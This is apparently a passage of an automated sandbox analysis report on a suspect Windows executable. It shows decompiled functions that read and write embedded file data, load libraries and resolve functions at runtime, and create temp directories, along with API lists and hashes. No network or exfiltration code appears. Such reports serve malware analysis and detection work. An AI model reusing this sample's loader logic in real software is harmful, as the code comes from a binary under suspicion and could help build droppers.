				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                  0x00402f06
                  0x00402f10
                  0x00402f19
                  0x00402f1d
                  0x00402f28
                  0x00402f28
                  0x00402f30
                  0x00402f32
                  0x00402f39
                  0x00402f55
                  0x00402f59
                  0x00403022
                  0x00403022
                  0x00000000
                  0x00402f68
                  0x00402f6b
                  0x00402f71
                  0x00402f78
                  0x00402f7b
                  0x00402f84
                  0x00402ff1
                  0x00402ff7
                  0x00402ff9
                  0x00402ff9
                  0x0040300b
                  0x0040300f
                  0x00000000
                  0x00403011
                  0x00403011
                  0x00403014
                  0x0040301a
                  0x00000000
                  0x0040301a
                  0x00402f86
                  0x00402f89
                  0x0040301d
                  0x0040301d
                  0x00402f8f
                  0x00402f94
                  0x00402f94
                  0x00402f9c
                  0x00402f9e
                  0x00402f9e
                  0x00402faf
                  0x00402fb3
                  0x00000000
                  0x00000000
                  0x00402fc7
                  0x00402fcf
                  0x00402fed
                  0x00403024
                  0x00403024
                  0x00402fd6
                  0x00402fd6
                  0x00402fd9
                  0x00402fdc
                  0x00402fdf
                  0x00402fe9
                  0x00000000
                  0x00402feb
                  0x00000000
                  0x00402feb
                  0x00402fe9
                  0x00000000
                  0x00402fcf
                  0x00000000
                  0x00402f94
                  0x00402f89
                  0x00402f84
                  0x00402f7b
                  0x00402f59
                  0x00403025
                  0x00403029

                  APIs
                  • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                  • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                  • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                  • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Read$PointerWrite
                  • String ID: 80A
                  • API String ID: 2113905535-195308239
                  • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                  • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                  • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 535 40302c-403055 GetTickCount 536 403196-40319e call 402bc5 535->536 537 40305b-403086 call 4031da SetFilePointer 535->537 542 4031a0-4031a5 536->542 543 40308b-40309d 537->543 544 4030a1-4030af call 4031a8 543->544 545 40309f 543->545 548 4030b5-4030c1 544->548 549 403188-40318b 544->549 545->544 550 4030c7-4030cd 548->550 549->542 551 4030f8-403114 call 405e9d 550->551 552 4030cf-4030d5 550->552 558 403191 551->558 559 403116-40311e 551->559 552->551 553 4030d7-4030f7 call 402bc5 552->553 553->551 560 403193-403194 558->560 561 403120-403136 WriteFile 559->561 562 403152-403158 559->562 560->542 563 403138-40313c 561->563 564 40318d-40318f 561->564 562->558 565 40315a-40315c 562->565 563->564 566 40313e-40314a 563->566 564->560 565->558 567 40315e-403171 565->567 566->550 568 403150 566->568 567->543 569 403177-403186 SetFilePointer 567->569 568->567 569->536
                  C-Code - Quality: 94%
                  			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x41e52
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x3c635
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x1531
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40c569
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x41e52
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                  0x00403030
                  0x0040303d
                  0x00403050
                  0x00403055
                  0x00403196
                  0x00403198
                  0x00000000
                  0x0040319e
                  0x00403061
                  0x00403074
                  0x0040307a
                  0x00403080
                  0x0040308b
                  0x0040308b
                  0x00403090
                  0x00403095
                  0x0040309d
                  0x0040309f
                  0x0040309f
                  0x004030a8
                  0x004030af
                  0x00000000
                  0x00000000
                  0x004030b5
                  0x004030bb
                  0x004030c1
                  0x00000000
                  0x004030c7
                  0x004030cd
                  0x004030d7
                  0x004030ed
                  0x004030f2
                  0x004030f7
                  0x004030fd
                  0x00403103
                  0x0040310d
                  0x00403114
                  0x00000000
                  0x00000000
                  0x00403116
                  0x0040311c
                  0x0040311e
                  0x00403152
                  0x00403158
                  0x00000000
                  0x00000000
                  0x0040315a
                  0x0040315c
                  0x00000000
                  0x00000000
                  0x0040315e
                  0x0040315e
                  0x00403171
                  0x00000000
                  0x00000000
                  0x00403180
                  0x00000000
                  0x00403180
                  0x0040312e
                  0x00403136
                  0x0040318d
                  0x00403193
                  0x00403193
                  0x00000000
                  0x0040313e
                  0x0040313e
                  0x00403144
                  0x0040314a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403150
                  0x00403191
                  0x00403191
                  0x00000000
                  0x00403191
                  0x00000000

                  APIs
                  • GetTickCount.KERNEL32 ref: 00403041
                    • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                  • WriteFile.KERNELBASE(0040B038,0040C569,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                  • SetFilePointer.KERNELBASE(00041E52,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Pointer$CountTickWrite
                  • String ID: 80A
                  • API String ID: 2146148272-195308239
                  • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                  • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                  • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 570 401f51-401f5d 571 401f63-401f79 call 4029e8 * 2 570->571 572 40200b-40200d 570->572 581 401f88-401f96 LoadLibraryExA 571->581 582 401f7b-401f86 GetModuleHandleA 571->582 573 402156-40215b call 401423 572->573 580 40287d-40288c 573->580 585 401f98-401fa6 GetProcAddress 581->585 586 402004-402006 581->586 582->581 582->585 587 401fe5-401fea call 404e23 585->587 588 401fa8-401fae 585->588 586->573 592 401fef-401ff2 587->592 590 401fb0-401fbc call 401423 588->590 591 401fc7-401fde call 735e1000 588->591 590->592 598 401fbe-401fc5 590->598 596 401fe0-401fe3 591->596 592->580 594 401ff8-401fff FreeLibrary 592->594 594->580 596->592 598->592
                  C-Code - Quality: 57%
                  			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                  0x00401f51
                  0x00401f51
                  0x00401f56
                  0x00401f5d
                  0x0040200b
                  0x00402156
                  0x00402156
                  0x0040287d
                  0x00402880
                  0x0040288c
                  0x0040288c
                  0x00401f6c
                  0x00401f76
                  0x00401f79
                  0x00401f88
                  0x00401f8c
                  0x00401f92
                  0x00401f96
                  0x00402004
                  0x00000000
                  0x00402004
                  0x00401f98
                  0x00401fa2
                  0x00401fa6
                  0x00401fea
                  0x00401fa8
                  0x00401fab
                  0x00401fae
                  0x00401fde
                  0x00401fb0
                  0x00401fb3
                  0x00401fbc
                  0x00401fbe
                  0x00401fbe
                  0x00401fbc
                  0x00401fae
                  0x00401ff2
                  0x00401ff9
                  0x00401ff9
                  0x00000000
                  0x00401ff2
                  0x00401f7c
                  0x00401f82
                  0x00401f86
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                  • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                  • String ID: ?B
                  • API String ID: 2987980305-117478770
                  • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                  • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                  • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 600 4015b3-4015c6 call 4029e8 call 40560c 605 4015c8-4015e3 call 4055a3 CreateDirectoryA 600->605 606 40160a-40160d 600->606 615 401600-401608 605->615 616 4015e5-4015f0 GetLastError 605->616 607 40162d-40215b call 401423 606->607 608 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 606->608 622 40287d-40288c 607->622 608->622 615->605 615->606 619 4015f2-4015fb GetFileAttributesA 616->619 620 4015fd 616->620 619->615 619->620 620->615
                  C-Code - Quality: 85%
                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                  0x004015b3
                  0x004015ba
                  0x004015bd
                  0x004015c2
                  0x004015c6
                  0x004015c8
                  0x004015d0
                  0x004015d6
                  0x004015d8
                  0x004015db
                  0x004015e3
                  0x004015f0
                  0x004015fd
                  0x004015fd
                  0x004015f2
                  0x004015f3
                  0x004015fb
                  0x00000000
                  0x00000000
                  0x004015fb
                  0x004015f0
                  0x00401600
                  0x00401603
                  0x00401605
                  0x00401606
                  0x004015c8
                  0x0040160d
                  0x0040162d
                  0x00402156
                  0x0040160f
                  0x00401611
                  0x0040161c
                  0x00401622
                  0x00401622
                  0x00402880
                  0x0040288c

                  APIs
                    • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 0040561A
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 3751793516-1104044542
                  • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                  • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                  • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 625 40578b-405795 626 405796-4057c0 GetTickCount GetTempFileNameA 625->626 627 4057c2-4057c4 626->627 628 4057cf-4057d1 626->628 627->626 629 4057c6 627->629 630 4057c9-4057cc 628->630 629->630
                  C-Code - Quality: 100%
                  			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                  0x0040578f
                  0x00405795
                  0x00405796
                  0x00405796
                  0x00405797
                  0x0040579e
                  0x004057a8
                  0x004057b5
                  0x004057b8
                  0x004057c0
                  0x00000000
                  0x00000000
                  0x004057c4
                  0x00000000
                  0x00000000
                  0x004057c6
                  0x00000000
                  0x004057c6
                  0x00000000

                  APIs
                  • GetTickCount.KERNEL32 ref: 0040579E
                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-262396425
                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B07DD Relevance: 7.7, APIs: 5, Instructions: 192fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021B0990
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: c904e8f7e3297663f87b7f88d02aaa80f4ad121676cd8b6bf9975e10d12a04e7
                  • Instruction ID: 598357265ac14edbbbe1cf5c2f7bd5e061478e6b12f6935d9f69644e17175251
                  • Opcode Fuzzy Hash: c904e8f7e3297663f87b7f88d02aaa80f4ad121676cd8b6bf9975e10d12a04e7
                  • Instruction Fuzzy Hash: AC711935E90348EEDB51DBE4E951BEEB7B6AF48710F208416E619FA2A0E7700E41DF05
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                  0x004031f2
                  0x004031f8
                  0x004031fe
                  0x00403205
                  0x0040320a
                  0x00403212
                  0x0040321e
                  0x00403224
                  0x00403208
                  0x00403208
                  0x00403208

                  APIs
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
